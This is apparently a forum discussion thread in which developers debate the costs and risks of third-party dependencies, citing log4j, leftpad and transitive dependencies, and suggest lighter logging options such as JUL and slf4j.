The log4j2 vulnerability is probably a good example of this. How many systems running log4j2 actually uses the JNDI functionality that led to the exploit?
I'm not sure they are ignoring those factors in their own code. It's more a case that the libraries might be increasing their risk factor by an order of magnitude or more.
Only if you use a small percentage of the functionality. If the dependency is maintained (not all are!) there is a good chance someone else discovered many of the bugs, the the per bugs per line of code metric should be much lower. And the dependency probably has some features you wish existed but can't justify the effort to write.
It is about trade offs. Is the time/money saved and the additional features gained worth the cost that some of features you don't use may result in more bugs that affect you in some way. For the most part I'd say no: I can write my own whatever, but that too will have bugs, and I need to fix all of them. I work with people who disagree with me on this one, and so we have a lot of pain maintaining code we wrote ourselves that isn't as good as a library I could have downloaded. Or in some case code that is already on our system - We have 6 different logging frameworks in one project, 3 we wrote in house, this is a big mess.
Another example is when the leftpad npm module broke the internet?
Not sure I would want to work in a place with such intense rules!
Ever work in Finance before?
"15-50 bugs per 1000 lines of code" is weird. The model should discount on number of years that have passed since a line was written.
I'm pretty sure the log4j bug was many years old.
Depending on the bug, it only takes one. There may be 14,999 non-serious bugs, and one Bad Bug. The other bugs just give the baddie some tall grass to hide in.
I think that not using dependencies, as a general rule, is good starting point, but, like all these "hard and fast" rules, the proper answer is "it depends."
I think that importing a 20KLoC JS library, so you can animate a single window opening is maybe not such a good idea, but it may be worth it, if you plan to animate dozens of window openings. Even then, it may be a good idea to have one of your more experienced geeks take some time to write a utility that gets reused throughout the project.
I use a lot of dependencies. I believe that modular design is an important component of managing complexity and ensuring high Quality.
But, the caveat is that I have written almost every dependency I use. I write each one as a standalone project, complete with heavy-duty documentation, and lots of testing (Usually, the testing code eclipses the actual implementation code).
Because of this, I can write a pretty damn robust application in just hours.
If anyone is interested in seeing what I mean (I don't expect many takers), they can always browse some of the modules in my various repos.
A specific example doesn't contradict the norm. Bug discovery is like a stochastic survival process. The more a line of code with a bug is tested, used or whatever, the higher the probability someone discovers the bug. This means the number of bugs decays with time and testing. This does not mean there are zero bugs in old code.
Elephant in the room is transitive dependencies.
> An interesting thing about developers is that we are lazy, and prefe to write as few lines of code as possible
This says so much about what is wrong with modern software development. It definitely wasn't the sentiment I studied and progressed through my career with over the last 30 years.
Isn't the whole essence of software that we are lazy? And so we write code so we don't do stuff ourselves?
Nothing wrong with being lazy if it gets things done, right?
It's not universally true either, not by a long way.
I've worked with plenty of devs who wore extreme verbosity almost as a badge of honour.
Beginner developers constantly reinvent the wheel
Intermediate developers use frameworks and code that already exists to avoid reinventing the wheel.
Expert developers use thin frameworks and minimize the external dependencies they need and maintain an internal library of simple foundational methods.
Nope. Beginner developers copy-paste code they don’t understand from Google searches. Including 1000+ transitive dependencies they also don’t understand. Experienced developers are really careful adding dependencies. Only adding dependencies when the value/cost equation really makes it worth it. Most Open Source dependencies are badly maintained and a bug fix might take years or will never happen.
Is there a minimal replacement for log4j?
System.out.println, or some thin wrapper there-around.
Most of what log4j does is stuff that arguably should be done outside of the application, such as log rotation and piping to file and what have you.
I mean, dependencies outside of your application are still dependencies. I trust, say, systemd somewhat more than I trust log4j (although both would very much be in my "broadly trustworthy" category), but a few years back there was the shellshock vulnerability, so it's not like system components are somehow immune here.
The difference with external dependencies is that they are in a sense independent from your code. The real devastating aspect with log4shell is that log4j couples and integrates itself with deployed code.
You can't just upgrade log4j without pushing a new release of your applications in the way you can say roll out an updated nginx or logrotate or kibana or whatever.
The built-in JUL package seems to be what you'd want if you are trying get rid of dependencies. In practice I find that using slf4j as your logging API is a good practice. You can start with it configured to be a wrapper around JUL and then add a different logging implementation if you need more features like file rotation, etc.
How to use it in case anyone is interested...
https://examples.javacodegeeks.com/core-java/util/logging/ja...
while you're at it, don't forget to cull significantly your SDK too.
...